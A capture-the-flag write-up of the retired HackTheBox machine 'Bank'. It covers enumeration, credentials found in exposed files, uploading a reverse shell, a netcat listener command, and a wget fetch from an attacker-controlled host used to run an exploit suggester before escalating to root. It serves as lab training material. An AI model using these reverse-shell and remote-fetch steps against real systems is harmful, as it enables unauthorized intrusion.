Hey folks, we back again with one of HackTheBox retired machines “Bank”, before we talk about it let’s take a look at its info

Let’s get started…

Nmap Scan

We usually start our scan with nmap scan to discover all open ports, service running, OS detection, etc

nmap -A -T4 -oG bank.gnmap 10.10.10.29

We have 3 open ports ssh/dns/http

I’ve tried to brute-force ssh credentials and search for vhosts or zone transfer but it fails so let’s go the next step, nothing important here

Web Enumeration

If you try to open 10.10.10.29:80 you will get the default page of the server

But if you try echo "10.10.10.29 bank.htb" > /etc/hosts and search for http://bank.htb you will get a different page ‘Login portal’ and by using this plugin I know that it redirect me to an unknown page before getting the login portal.

Let’s start to discover the hidden directories by using dirbuster/gobuster/ffuf/dirsearch

You will get more a bunch of directories which is open and available.

After discovering them I’ve big data in the last one /balance_transfer

Note that all these files have the same size but there’s one has different size, so we will open it first

Good we found credentials, let’s use it to login at the login portal

Here we go! Nice design :)

User Flag

After discovering the whole account, I’ve found an upload function on bank.htb/support and then we grabbed a reverse shell from here and then uploaded it

The next step is to open nc as listener on the port which I insert it to the shell code nc -lvp <port> and then access the shell form the website

Nice, we’re in the server now but unfortunately in the user priv not root so let’s grab the user.txt first and then try to be root

/home/chris

Root Flag

It’s time now to grab the root.txt. I’ve used Linux-Exploit-Suggester to know which vulnerabilities the machine is affected by downloading it on the attack machine and then transfer it to the vulnerable machine

I’ve used python -m SimpleHTTPServer 80 to make the attacker machine act as a server, and then go to /tmp directory in the vulnerable machine to have permission to write there and then downloaded it wget http://<attacker-machine-ip>/<file-name> and it was downloaded. Let’s execute it

We have 4 vulnerabilities which works on this machine but unfortunately there’s no one of them works with me, so I’ll try to discover all directories to find any juicy file which gave me a root access

After minutes, I’ve found this directory /var/htb

And have this executable file

As you can see I’ve tried to execute it but it’s fail so I execute it from the bin directory and it’s worked as you can see ❤

Congrats and Thank you ❤

Stay in touch

LinkedIn | GitHub | Twitter

Offensive Security Enthusiast